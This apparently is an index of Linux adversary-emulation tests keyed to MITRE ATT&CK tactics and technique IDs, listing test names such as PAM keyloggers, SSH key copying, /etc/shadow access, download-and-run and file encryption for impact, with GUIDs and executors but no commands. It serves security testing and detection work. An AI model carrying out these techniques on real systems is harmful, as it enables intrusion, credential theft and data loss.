106 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 1 Create a hidden file in a hidden directory 61a782e5-9a19-40b5-8ba4-69a4b9f3d7be sh
107 defense-evasion T1078.003 Valid Accounts: Local Accounts 8 Create local account (Linux) 02a91c34-8a5b-4bed-87af-501103eb5357 bash
108 defense-evasion T1078.003 Valid Accounts: Local Accounts 9 Reactivate a locked/expired account (Linux) d2b95631-62d7-45a3-aaef-0972cea97931 bash
109 defense-evasion T1078.003 Valid Accounts: Local Accounts 10 Login as nobody (Linux) 3d2cd093-ee05-41bd-a802-59ee5c301b85 bash
110 persistence T1556.003 Modify Authentication Process: Pluggable Authentication Modules 1 Malicious PAM rule 4b9dde80-ae22-44b1-a82a-644bf009eb9c sh
111 persistence T1556.003 Modify Authentication Process: Pluggable Authentication Modules 2 Malicious PAM module 65208808-3125-4a2e-8389-a0a00e9ab326 sh
112 persistence T1053.003 Scheduled Task/Job: Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 bash
113 persistence T1053.003 Scheduled Task/Job: Cron 2 Cron - Add script to all cron subfolders b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
114 persistence T1053.003 Scheduled Task/Job: Cron 3 Cron - Add script to /var/spool/cron/crontabs/ folder 2d943c18-e74a-44bf-936f-25ade6cccab4 bash
115 persistence T1176 Browser Extensions 1 Chrome (Developer Mode) 3ecd790d-2617-4abf-9a8c-4e8d47da9ee1 manual
116 persistence T1176 Browser Extensions 2 Chrome (Chrome Web Store) 4c83940d-8ca5-4bb2-8100-f46dc914bc3f manual
117 persistence T1176 Browser Extensions 3 Firefox cb790029-17e6-4c43-b96f-002ce5f10938 manual
118 persistence T1546.005 Event Triggered Execution: Trap 1 Trap EXIT a74b2e07-5952-4c03-8b56-56274b076b61 sh
119 persistence T1546.005 Event Triggered Execution: Trap 2 Trap SIGINT a547d1ba-1d7a-4cc5-a9cb-8d65e8809636 sh
120 persistence T1574.006 Hijack Execution Flow: LD_PRELOAD 1 Shared Library Injection via /etc/ld.so.preload 39cb0e67-dd0d-4b74-a74b-c072db7ae991 bash
121 persistence T1574.006 Hijack Execution Flow: LD_PRELOAD 2 Shared Library Injection via LD_PRELOAD bc219ff7-789f-4d51-9142-ecae3397deae bash
122 persistence T1136.001 Create Account: Local Account 1 Create a user account on a Linux system 40d8eabd-e394-46f6-8785-b9bfa1d011d2 bash
123 persistence T1136.001 Create Account: Local Account 5 Create a new user in Linux with `root` UID and GID. a1040a30-d28b-4eda-bd99-bb2861a4616c bash
124 persistence T1098.004 SSH Authorized Keys 1 Modify SSH Authorized Keys 342cc723-127c-4d3a-8292-9c0c6b4ecadc bash
125 persistence T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions 1 Linux - Load Kernel Module via insmod 687dcb93-9656-4853-9c36-9977315e9d23 bash
126 persistence T1053.006 Scheduled Task/Job: Systemd Timers 1 Create Systemd Service and Timer f4983098-bb13-44fb-9b2c-46149961807b bash
127 persistence T1053.006 Scheduled Task/Job: Systemd Timers 2 Create a user level transient systemd service and timer 3de33f5b-62e5-4e63-a2a0-6fd8808c80ec sh
128 persistence T1053.006 Scheduled Task/Job: Systemd Timers 3 Create a system level transient systemd service and timer d3eda496-1fc0-49e9-aff5-3bec5da9fa22 sh
129 persistence T1546.004 Event Triggered Execution: .bash_profile and .bashrc 1 Add command to .bash_profile 94500ae1-7e31-47e3-886b-c328da46872f sh
130 persistence T1546.004 Event Triggered Execution: .bash_profile and .bashrc 2 Add command to .bashrc 0a898315-4cfa-4007-bafe-33a4646d115f sh
131 persistence T1546.004 Event Triggered Execution: .bash_profile and .bashrc 3 Append to the system shell profile 694b3cc8-6a78-4d35-9e74-0123d009e94b sh
132 persistence T1546.004 Event Triggered Execution: .bash_profile and .bashrc 4 Append commands user shell profile bbdb06bc-bab6-4f5b-8232-ba3fbed51d77 sh
133 persistence T1546.004 Event Triggered Execution: .bash_profile and .bashrc 5 System shell profile scripts 8fe2ccfd-f079-4c03-b1a9-bd9b362b67d4 sh
134 persistence T1546.004 Event Triggered Execution: .bash_profile and .bashrc 6 Create/Append to .bash_logout 37ad2f24-7c53-4a50-92da-427a4ad13f58 bash
135 persistence T1037.004 Boot or Logon Initialization Scripts: Rc.common 2 rc.common c33f3d80-5f04-419b-a13a-854d1cbdbf3a bash
136 persistence T1037.004 Boot or Logon Initialization Scripts: Rc.common 3 rc.local 126f71af-e1c9-405c-94ef-26a47b16c102 bash
137 persistence T1543.002 Create or Modify System Process: Systemd Service 1 Create Systemd Service d9e4f24f-aa67-4c6e-bcbf-85622b697a7c bash
138 persistence T1543.002 Create or Modify System Process: Systemd Service 2 Create Systemd Service file, Enable the service , Modify and Reload the service. c35ac4a8-19de-43af-b9f8-755da7e89c89 bash
139 persistence T1053.002 Scheduled Task/Job: At 2 At - Schedule a job 7266d898-ac82-4ec0-97c7-436075d0d08e sh
140 persistence T1078.003 Valid Accounts: Local Accounts 8 Create local account (Linux) 02a91c34-8a5b-4bed-87af-501103eb5357 bash
141 persistence T1078.003 Valid Accounts: Local Accounts 9 Reactivate a locked/expired account (Linux) d2b95631-62d7-45a3-aaef-0972cea97931 bash
142 persistence T1078.003 Valid Accounts: Local Accounts 10 Login as nobody (Linux) 3d2cd093-ee05-41bd-a802-59ee5c301b85 bash
143 command-and-control T1132.001 Data Encoding: Standard Encoding 1 Base64 Encoded data. 1164f70f-9a88-4dff-b9ff-dc70e7bf0c25 sh
144 command-and-control T1090.003 Proxy: Multi-hop Proxy 3 Tor Proxy Usage - Debian/Ubuntu 5ff9d047-6e9c-4357-b39b-5cf89d9b59c7 sh
145 command-and-control T1571 Non-Standard Port 2 Testing usage of uncommonly used port 5db21e1d-dd9c-4a50-b885-b1e748912767 sh
146 command-and-control T1071.001 Application Layer Protocol: Web Protocols 3 Malicious User Agents - Nix 2d7c471a-e887-4b78-b0dc-b0df1f2e0658 sh
147 command-and-control T1105 Ingress Tool Transfer 1 rsync remote file copy (push) 0fc6e977-cb12-44f6-b263-2824ba917409 bash
148 command-and-control T1105 Ingress Tool Transfer 2 rsync remote file copy (pull) 3180f7d5-52c0-4493-9ea0-e3431a84773f bash
149 command-and-control T1105 Ingress Tool Transfer 3 scp remote file copy (push) 83a49600-222b-4866-80a0-37736ad29344 bash
150 command-and-control T1105 Ingress Tool Transfer 4 scp remote file copy (pull) b9d22b9a-9778-4426-abf0-568ea64e9c33 bash
151 command-and-control T1105 Ingress Tool Transfer 5 sftp remote file copy (push) f564c297-7978-4aa9-b37a-d90477feea4e bash
152 command-and-control T1105 Ingress Tool Transfer 6 sftp remote file copy (pull) 0139dba1-f391-405e-a4f5-f3989f2c88ef bash
153 command-and-control T1105 Ingress Tool Transfer 14 whois file download c99a829f-0bb8-4187-b2c6-d47d1df74cab sh
154 command-and-control T1105 Ingress Tool Transfer 27 Linux Download File and Run bdc373c5-e9cf-4563-8a7b-a9ba720a90f3 sh
155 command-and-control T1090.001 Proxy: Internal Proxy 1 Connection Proxy 0ac21132-4485-4212-a681-349e8a6637cd sh
156 collection T1560.001 Archive Collected Data: Archive via Utility 5 Data Compressed - nix - zip c51cec55-28dd-4ad2-9461-1eacbc82c3a0 sh
157 collection T1560.001 Archive Collected Data: Archive via Utility 6 Data Compressed - nix - gzip Single File cde3c2af-3485-49eb-9c1f-0ed60e9cc0af sh
158 collection T1560.001 Archive Collected Data: Archive via Utility 7 Data Compressed - nix - tar Folder or File 7af2b51e-ad1c-498c-aca8-d3290c19535a sh
159 collection T1560.001 Archive Collected Data: Archive via Utility 8 Data Encrypted with zip and gpg symmetric 0286eb44-e7ce-41a0-b109-3da516e05a5f sh
160 collection T1560.001 Archive Collected Data: Archive via Utility 9 Encrypts collected data with AES-256 and Base64 a743e3a6-e8b2-4a30-abe7-ca85d201b5d3 bash
161 collection T1113 Screen Capture 3 X Windows Capture 8206dd0c-faf6-4d74-ba13-7fbe13dce6ac bash
162 collection T1113 Screen Capture 4 Capture Linux Desktop using Import Tool 9cd1cccb-91e4-4550-9139-e20a586fcea1 bash
163 collection T1056.001 Input Capture: Keylogging 2 Living off the land Terminal Input Capture on Linux with pam.d 9c6bdb34-a89f-4b90-acb1-5970614c711b sh
164 collection T1056.001 Input Capture: Keylogging 3 Logging bash history to syslog 0e59d59d-3265-4d35-bebd-bf5c1ec40db5 sh
165 collection T1056.001 Input Capture: Keylogging 4 Bash session based keylogger 7f85a946-a0ea-48aa-b6ac-8ff539278258 sh
166 collection T1056.001 Input Capture: Keylogging 5 SSHD PAM keylogger 81d7d2ad-d644-4b6a-bea7-28ffe43becca sh
167 collection T1056.001 Input Capture: Keylogging 6 Auditd keylogger a668edb9-334e-48eb-8c2e-5413a40867af sh
168 collection T1074.001 Data Staged: Local Data Staging 2 Stage data from Discovery.sh 39ce0303-ae16-4b9e-bb5b-4f53e8262066 bash
169 collection T1115 Clipboard Data 5 Add or copy content to clipboard with xClip ee363e53-b083-4230-aff3-f8d955f2d5bb sh
170 collection T1560.002 Archive Collected Data: Archive via Library 1 Compressing data using GZip in Python (Linux) 391f5298-b12d-4636-8482-35d9c17d53a8 bash
171 collection T1560.002 Archive Collected Data: Archive via Library 2 Compressing data using bz2 in Python (Linux) c75612b2-9de0-4d7c-879c-10d7b077072d bash
172 collection T1560.002 Archive Collected Data: Archive via Library 3 Compressing data using zipfile in Python (Linux) 001a042b-859f-44d9-bf81-fd1c4e2200b0 bash
173 collection T1560.002 Archive Collected Data: Archive via Library 4 Compressing data using tarfile in Python (Linux) e86f1b4b-fcc1-4a2a-ae10-b49da01458db bash
174 privilege-escalation T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 Sudo usage 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e sh
175 privilege-escalation T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 2 Unlimited sudo cache timeout a7b17659-dd5e-46f7-b7d1-e6792c91d0bc sh
176 privilege-escalation T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 3 Disable tty_tickets for sudo caching 91a60b03-fb75-4d24-a42e-2eb8956e8de1 sh
177 privilege-escalation T1053.003 Scheduled Task/Job: Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 bash
178 privilege-escalation T1053.003 Scheduled Task/Job: Cron 2 Cron - Add script to all cron subfolders b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
179 privilege-escalation T1053.003 Scheduled Task/Job: Cron 3 Cron - Add script to /var/spool/cron/crontabs/ folder 2d943c18-e74a-44bf-936f-25ade6cccab4 bash
180 privilege-escalation T1546.005 Event Triggered Execution: Trap 1 Trap EXIT a74b2e07-5952-4c03-8b56-56274b076b61 sh
181 privilege-escalation T1546.005 Event Triggered Execution: Trap 2 Trap SIGINT a547d1ba-1d7a-4cc5-a9cb-8d65e8809636 sh
182 privilege-escalation T1574.006 Hijack Execution Flow: LD_PRELOAD 1 Shared Library Injection via /etc/ld.so.preload 39cb0e67-dd0d-4b74-a74b-c072db7ae991 bash
183 privilege-escalation T1574.006 Hijack Execution Flow: LD_PRELOAD 2 Shared Library Injection via LD_PRELOAD bc219ff7-789f-4d51-9142-ecae3397deae bash
184 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 1 Make and modify binary from C source 896dfe97-ae43-4101-8e96-9a7996555d80 sh
185 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 2 Set a SetUID flag on file 759055b3-3885-4582-a8ec-c00c9d64dd79 sh
186 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 3 Set a SetGID flag on file db55f666-7cba-46c6-9fe6-205a05c3242c sh
187 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 4 Make and modify capabilities of a binary db53959c-207d-4000-9e7a-cd8eb417e072 sh
188 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 5 Provide the SetUID capability to a file 1ac3272f-9bcf-443a-9888-4b1d3de785c1 sh
189 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 6 Do reconnaissance for files that have the setuid bit set 8e36da01-cd29-45fd-be72-8a0fcaad4481 sh
190 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 7 Do reconnaissance for files that have the setgid bit set 3fb46e17-f337-4c14-9f9a-a471946533e2 sh
191 privilege-escalation T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions 1 Linux - Load Kernel Module via insmod 687dcb93-9656-4853-9c36-9977315e9d23 bash
192 privilege-escalation T1053.006 Scheduled Task/Job: Systemd Timers 1 Create Systemd Service and Timer f4983098-bb13-44fb-9b2c-46149961807b bash
193 privilege-escalation T1053.006 Scheduled Task/Job: Systemd Timers 2 Create a user level transient systemd service and timer 3de33f5b-62e5-4e63-a2a0-6fd8808c80ec sh
194 privilege-escalation T1053.006 Scheduled Task/Job: Systemd Timers 3 Create a system level transient systemd service and timer d3eda496-1fc0-49e9-aff5-3bec5da9fa22 sh
195 privilege-escalation T1546.004 Event Triggered Execution: .bash_profile and .bashrc 1 Add command to .bash_profile 94500ae1-7e31-47e3-886b-c328da46872f sh
196 privilege-escalation T1546.004 Event Triggered Execution: .bash_profile and .bashrc 2 Add command to .bashrc 0a898315-4cfa-4007-bafe-33a4646d115f sh
197 privilege-escalation T1546.004 Event Triggered Execution: .bash_profile and .bashrc 3 Append to the system shell profile 694b3cc8-6a78-4d35-9e74-0123d009e94b sh
198 privilege-escalation T1546.004 Event Triggered Execution: .bash_profile and .bashrc 4 Append commands user shell profile bbdb06bc-bab6-4f5b-8232-ba3fbed51d77 sh
199 privilege-escalation T1546.004 Event Triggered Execution: .bash_profile and .bashrc 5 System shell profile scripts 8fe2ccfd-f079-4c03-b1a9-bd9b362b67d4 sh
200 privilege-escalation T1546.004 Event Triggered Execution: .bash_profile and .bashrc 6 Create/Append to .bash_logout 37ad2f24-7c53-4a50-92da-427a4ad13f58 bash
201 privilege-escalation T1037.004 Boot or Logon Initialization Scripts: Rc.common 2 rc.common c33f3d80-5f04-419b-a13a-854d1cbdbf3a bash
202 privilege-escalation T1037.004 Boot or Logon Initialization Scripts: Rc.common 3 rc.local 126f71af-e1c9-405c-94ef-26a47b16c102 bash
203 privilege-escalation T1543.002 Create or Modify System Process: Systemd Service 1 Create Systemd Service d9e4f24f-aa67-4c6e-bcbf-85622b697a7c bash
204 privilege-escalation T1543.002 Create or Modify System Process: Systemd Service 2 Create Systemd Service file, Enable the service , Modify and Reload the service. c35ac4a8-19de-43af-b9f8-755da7e89c89 bash
205 privilege-escalation T1053.002 Scheduled Task/Job: At 2 At - Schedule a job 7266d898-ac82-4ec0-97c7-436075d0d08e sh
206 privilege-escalation T1078.003 Valid Accounts: Local Accounts 8 Create local account (Linux) 02a91c34-8a5b-4bed-87af-501103eb5357 bash
207 privilege-escalation T1078.003 Valid Accounts: Local Accounts 9 Reactivate a locked/expired account (Linux) d2b95631-62d7-45a3-aaef-0972cea97931 bash
208 privilege-escalation T1078.003 Valid Accounts: Local Accounts 10 Login as nobody (Linux) 3d2cd093-ee05-41bd-a802-59ee5c301b85 bash
209 credential-access T1556.003 Modify Authentication Process: Pluggable Authentication Modules 1 Malicious PAM rule 4b9dde80-ae22-44b1-a82a-644bf009eb9c sh
210 credential-access T1556.003 Modify Authentication Process: Pluggable Authentication Modules 2 Malicious PAM module 65208808-3125-4a2e-8389-a0a00e9ab326 sh
211 credential-access T1056.001 Input Capture: Keylogging 2 Living off the land Terminal Input Capture on Linux with pam.d 9c6bdb34-a89f-4b90-acb1-5970614c711b sh
212 credential-access T1056.001 Input Capture: Keylogging 3 Logging bash history to syslog 0e59d59d-3265-4d35-bebd-bf5c1ec40db5 sh
213 credential-access T1056.001 Input Capture: Keylogging 4 Bash session based keylogger 7f85a946-a0ea-48aa-b6ac-8ff539278258 sh
214 credential-access T1056.001 Input Capture: Keylogging 5 SSHD PAM keylogger 81d7d2ad-d644-4b6a-bea7-28ffe43becca sh
215 credential-access T1056.001 Input Capture: Keylogging 6 Auditd keylogger a668edb9-334e-48eb-8c2e-5413a40867af sh
216 credential-access T1110.001 Brute Force: Password Guessing 5 SUDO Brute Force - Debian ba1bf0b6-f32b-4db0-b7cc-d78cacc76700 bash
217 credential-access T1110.001 Brute Force: Password Guessing 6 SUDO Brute Force - Redhat 4097bc00-5eeb-4d56-aaf9-287d60351d95 bash
218 credential-access T1003.007 OS Credential Dumping: Proc Filesystem 1 Dump individual process memory with sh (Local) 7e91138a-8e74-456d-a007-973d67a0bb80 sh
219 credential-access T1003.007 OS Credential Dumping: Proc Filesystem 2 Dump individual process memory with Python (Local) 437b2003-a20d-4ed8-834c-4964f24eec63 sh
220 credential-access T1003.007 OS Credential Dumping: Proc Filesystem 3 Capture Passwords with MimiPenguin a27418de-bdce-4ebd-b655-38f04842bf0c bash
221 credential-access T1040 Network Sniffing 1 Packet Capture Linux using tshark or tcpdump 7fe741f7-b265-4951-a7c7-320889083b3e bash
222 credential-access T1040 Network Sniffing 9 Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo 10c710c9-9104-4d5f-8829-5b65391e2a29 bash
223 credential-access T1040 Network Sniffing 10 Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo 7a0895f0-84c1-4adf-8491-a21510b1d4c1 bash
224 credential-access T1040 Network Sniffing 11 Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo 515575ab-d213-42b1-aa64-ef6a2dd4641b bash
225 credential-access T1040 Network Sniffing 12 Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo b1cbdf8b-6078-48f5-a890-11ea19d7f8e9 bash
226 credential-access T1552 Unsecured Credentials 1 AWS - Retrieve EC2 Password Data using stratus a21118de-b11e-4ebd-b655-42f11142df0c sh
227 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 9 LaZagne.py - Dump Credentials from Firefox Browser 87e88698-621b-4c45-8a89-4eaebdeaabb1 sh
228 credential-access T1552.004 Unsecured Credentials: Private Keys 2 Discover Private SSH Keys 46959285-906d-40fa-9437-5a439accd878 sh
229 credential-access T1552.004 Unsecured Credentials: Private Keys 3 Copy Private SSH Keys with CP 7c247dc7-5128-4643-907b-73a76d9135c3 sh
230 credential-access T1552.004 Unsecured Credentials: Private Keys 4 Copy Private SSH Keys with rsync 864bb0b2-6bb5-489a-b43b-a77b3a16d68a sh
231 credential-access T1552.004 Unsecured Credentials: Private Keys 5 Copy the users GnuPG directory with rsync 2a5a0601-f5fb-4e2e-aa09-73282ae6afca sh
232 credential-access T1552.003 Unsecured Credentials: Bash History 1 Search Through Bash History 3cfde62b-7c33-4b26-a61e-755d6131c8ce sh
233 credential-access T1552.001 Unsecured Credentials: Credentials In Files 1 Find AWS credentials 2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17 sh
234 credential-access T1552.001 Unsecured Credentials: Credentials In Files 3 Extract passwords with grep bd4cf0d1-7646-474e-8610-78ccf5a097c4 sh
235 credential-access T1552.001 Unsecured Credentials: Credentials In Files 6 Find and Access Github Credentials da4f751a-020b-40d7-b9ff-d433b7799803 bash
236 credential-access T1110.004 Brute Force: Credential Stuffing 1 SSH Credential Stuffing From Linux 4f08197a-2a8a-472d-9589-cd2895ef22ad bash
237 credential-access T1003.008 OS Credential Dumping: /etc/passwd and /etc/shadow 1 Access /etc/shadow (Local) 3723ab77-c546-403c-8fb4-bb577033b235 bash
238 credential-access T1003.008 OS Credential Dumping: /etc/passwd and /etc/shadow 2 Access /etc/passwd (Local) 60e860b6-8ae6-49db-ad07-5e73edd88f5d sh
239 credential-access T1003.008 OS Credential Dumping: /etc/passwd and /etc/shadow 3 Access /etc/{shadow,passwd} with a standard bin that's not cat df1a55ae-019d-4120-bc35-94f4bc5c4b0a bash
240 credential-access T1003.008 OS Credential Dumping: /etc/passwd and /etc/shadow 4 Access /etc/{shadow,passwd} with shell builtins f5aa6543-6cb2-4fae-b9c2-b96e14721713 bash
241 discovery T1033 System Owner/User Discovery 2 System Owner/User Discovery 2a9b677d-a230-44f4-ad86-782df1ef108c sh
242 discovery T1087.001 Account Discovery: Local Account 1 Enumerate all accounts (Local) f8aab3dd-5990-4bf8-b8ab-2226c951696f sh
243 discovery T1087.001 Account Discovery: Local Account 2 View sudoers access fed9be70-0186-4bde-9f8a-20945f9370c2 sh
244 discovery T1087.001 Account Discovery: Local Account 3 View accounts with UID 0 c955a599-3653-4fe5-b631-f11c00eb0397 sh
245 discovery T1087.001 Account Discovery: Local Account 4 List opened files by user 7e46c7a5-0142-45be-a858-1a3ecb4fd3cb sh
246 discovery T1087.001 Account Discovery: Local Account 5 Show if a user account has ever logged in remotely 0f0b6a29-08c3-44ad-a30b-47fd996b2110 sh
247 discovery T1087.001 Account Discovery: Local Account 6 Enumerate users and groups e6f36545-dc1e-47f0-9f48-7f730f54a02e sh
248 discovery T1497.001 Virtualization/Sandbox Evasion: System Checks 1 Detect Virtualization Environment (Linux) dfbd1a21-540d-4574-9731-e852bd6fe840 sh
249 discovery T1007 System Service Discovery 3 System Service Discovery - systemctl f4b26bce-4c2c-46c0-bcc5-fce062d38bef bash
250 discovery T1040 Network Sniffing 1 Packet Capture Linux using tshark or tcpdump 7fe741f7-b265-4951-a7c7-320889083b3e bash
251 discovery T1040 Network Sniffing 9 Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo 10c710c9-9104-4d5f-8829-5b65391e2a29 bash
252 discovery T1040 Network Sniffing 10 Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo 7a0895f0-84c1-4adf-8491-a21510b1d4c1 bash
253 discovery T1040 Network Sniffing 11 Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo 515575ab-d213-42b1-aa64-ef6a2dd4641b bash
254 discovery T1040 Network Sniffing 12 Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo b1cbdf8b-6078-48f5-a890-11ea19d7f8e9 bash
255 discovery T1135 Network Share Discovery 2 Network Share Discovery - linux 875805bc-9e86-4e87-be86-3a5527315cae bash
256 discovery T1082 System Information Discovery 3 List OS Information cccb070c-df86-4216-a5bc-9fb60c74e27c sh
257 discovery T1082 System Information Discovery 4 Linux VM Check via Hardware 31dad7ad-2286-4c02-ae92-274418c85fec bash
258 discovery T1082 System Information Discovery 5 Linux VM Check via Kernel Modules 8057d484-0fae-49a4-8302-4812c4f1e64e bash
259 discovery T1082 System Information Discovery 7 Hostname Discovery 486e88ea-4f56-470f-9b57-3f4d73f39133 bash
260 discovery T1082 System Information Discovery 11 Environment variables discovery on macos and linux fcbdd43f-f4ad-42d5-98f3-0218097e2720 sh
261 discovery T1082 System Information Discovery 24 Linux List Kernel Modules 034fe21c-3186-49dd-8d5d-128b35f181c7 sh
262 discovery T1217 Browser Bookmark Discovery 1 List Mozilla Firefox Bookmark Database Files on Linux 3a41f169-a5ab-407f-9269-abafdb5da6c2 sh
263 discovery T1016 System Network Configuration Discovery 3 System Network Configuration Discovery c141bbdb-7fca-4254-9fd6-f47e79447e17 sh
264 discovery T1083 File and Directory Discovery 3 Nix File and Directory Discovery ffc8b249-372a-4b74-adcd-e4c0430842de sh
265 discovery T1083 File and Directory Discovery 4 Nix File and Directory Discovery 2 13c5e1ae-605b-46c4-a79f-db28c77ff24e sh
266 discovery T1049 System Network Connections Discovery 3 System Network Connections Discovery Linux & MacOS 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2 sh
267 discovery T1057 Process Discovery 1 Process Discovery - ps 4ff64f0b-aaf2-4866-b39d-38d9791407cc sh
268 discovery T1069.001 Permission Groups Discovery: Local Groups 1 Permission Groups Discovery (Local) 952931a4-af0b-4335-bbbe-73c8c5b327ae sh
269 discovery T1201 Password Policy Discovery 1 Examine password complexity policy - Ubuntu 085fe567-ac84-47c7-ac4c-2688ce28265b bash
270 discovery T1201 Password Policy Discovery 2 Examine password complexity policy - CentOS/RHEL 7.x 78a12e65-efff-4617-bc01-88f17d71315d bash
271 discovery T1201 Password Policy Discovery 3 Examine password complexity policy - CentOS/RHEL 6.x 6ce12552-0adb-4f56-89ff-95ce268f6358 bash
272 discovery T1201 Password Policy Discovery 4 Examine password expiration policy - All Linux 7c86c55c-70fa-4a05-83c9-3aa19b145d1a bash
273 discovery T1614.001 System Location Discovery: System Language Discovery 3 Discover System Language with locale 837d609b-845e-4519-90ce-edc3b4b0e138 sh
274 discovery T1614.001 System Location Discovery: System Language Discovery 4 Discover System Language with localectl 07ce871a-b3c3-44a3-97fa-a20118fdc7c9 sh
275 discovery T1614.001 System Location Discovery: System Language Discovery 5 Discover System Language by locale file 5d7057c9-2c8a-4026-91dd-13b5584daa69 sh
276 discovery T1614.001 System Location Discovery: System Language Discovery 6 Discover System Language by Environment Variable Query cb8f7cdc-36c4-4ed0-befc-7ad7d24dfd7a sh
277 discovery T1518.001 Software Discovery: Security Software Discovery 4 Security Software Discovery - ps (Linux) 23b91cd2-c99c-4002-9e41-317c63e024a2 sh
278 discovery T1018 Remote System Discovery 6 Remote System Discovery - arp nix acb6b1ff-e2ad-4d64-806c-6c35fe73b951 sh
279 discovery T1018 Remote System Discovery 7 Remote System Discovery - sweep 96db2632-8417-4dbb-b8bb-a8b92ba391de sh
280 discovery T1018 Remote System Discovery 12 Remote System Discovery - ip neighbour 158bd4dd-6359-40ab-b13c-285b9ef6fa25 sh
281 discovery T1018 Remote System Discovery 13 Remote System Discovery - ip route 1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1 sh
282 discovery T1018 Remote System Discovery 14 Remote System Discovery - ip tcp_metrics 6c2da894-0b57-43cb-87af-46ea3b501388 sh
283 discovery T1046 Network Service Discovery 1 Port Scan 68e907da-2539-48f6-9fc9-257a78c05540 bash
284 discovery T1046 Network Service Discovery 2 Port Scan Nmap 515942b0-a09f-4163-a7bb-22fefb6f185f sh
285 impact T1531 Account Access Removal 4 Change User Password via passwd 3c717bf3-2ecc-4d79-8ac8-0bfbf08fbce6 sh
286 impact T1486 Data Encrypted for Impact 1 Encrypt files using gpg (Linux) 7b8ce084-3922-4618-8d22-95f996173765 bash
287 impact T1486 Data Encrypted for Impact 2 Encrypt files using 7z (Linux) 53e6735a-4727-44cc-b35b-237682a151ad bash
288 impact T1486 Data Encrypted for Impact 3 Encrypt files using ccrypt (Linux) 08cbf59f-85da-4369-a5f4-049cffd7709f bash
289 impact T1486 Data Encrypted for Impact 4 Encrypt files using openssl (Linux) 142752dc-ca71-443b-9359-cf6f497315f1 bash
290 impact T1496 Resource Hijacking 1 macOS/Linux - Simulate CPU Load with Yes 904a5a0e-fb02-490d-9f8d-0e256eb37549 bash
291 impact T1485 Data Destruction 2 macOS/Linux - Overwrite file with DD 38deee99-fd65-4031-bec8-bfa4f9f26146 bash
292 impact T1529 System Shutdown/Reboot 3 Restart System via `shutdown` - macOS/Linux 6326dbc4-444b-4c04-88f4-27e94d0327cb bash
293 impact T1529 System Shutdown/Reboot 4 Shutdown System via `shutdown` - macOS/Linux 4963a81e-a3ad-4f02-adda-812343b351de bash
294 impact T1529 System Shutdown/Reboot 5 Restart System via `reboot` - macOS/Linux 47d0b042-a918-40ab-8cf9-150ffe919027 bash
295 impact T1529 System Shutdown/Reboot 6 Shutdown System via `halt` - Linux 918f70ab-e1ef-49ff-bc57-b27021df84dd bash
296 impact T1529 System Shutdown/Reboot 7 Reboot System via `halt` - Linux 78f92e14-f1e9-4446-b3e9-f1b921f2459e bash
297 impact T1529 System Shutdown/Reboot 8 Shutdown System via `poweroff` - Linux 73a90cd2-48a2-4ac5-8594-2af35fa909fa bash
298 impact T1529 System Shutdown/Reboot 9 Reboot System via `poweroff` - Linux 61303105-ff60-427b-999e-efb90b314e41 bash
299 execution T1053.003 Scheduled Task/Job: Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 bash
300 execution T1053.003 Scheduled Task/Job: Cron 2 Cron - Add script to all cron subfolders b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
301 execution T1053.003 Scheduled Task/Job: Cron 3 Cron - Add script to /var/spool/cron/crontabs/ folder 2d943c18-e74a-44bf-936f-25ade6cccab4 bash
302 execution T1053.006 Scheduled Task/Job: Systemd Timers 1 Create Systemd Service and Timer f4983098-bb13-44fb-9b2c-46149961807b bash
303 execution T1053.006 Scheduled Task/Job: Systemd Timers 2 Create a user level transient systemd service and timer 3de33f5b-62e5-4e63-a2a0-6fd8808c80ec sh
304 execution T1053.006 Scheduled Task/Job: Systemd Timers 3 Create a system level transient systemd service and timer d3eda496-1fc0-49e9-aff5-3bec5da9fa22 sh
305 execution T1059.004 Command and Scripting Interpreter: Bash 1 Create and Execute Bash Shell Script 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873 sh
306 execution T1059.004 Command and Scripting Interpreter: Bash 2 Command-Line Interface d0c88567-803d-4dca-99b4-7ce65e7b257c sh
307 execution T1059.004 Command and Scripting Interpreter: Bash 3 Harvest SUID executable files 46274fc6-08a7-4956-861b-24cbbaa0503c sh
308 execution T1059.004 Command and Scripting Interpreter: Bash 4 LinEnum tool execution a2b35a63-9df1-4806-9a4d-5fe0500845f2 sh
309 execution T1059.004 Command and Scripting Interpreter: Bash 5 New script file in the tmp directory 8cd1947b-4a54-41fb-b5ea-07d0ace04f81 sh
310 execution T1059.004 Command and Scripting Interpreter: Bash 6 What shell is running 7b38e5cc-47be-44f0-a425-390305c76c17 sh
311 execution T1059.004 Command and Scripting Interpreter: Bash 7 What shells are available bf23c7dc-1004-4949-8262-4c1d1ef87702 sh
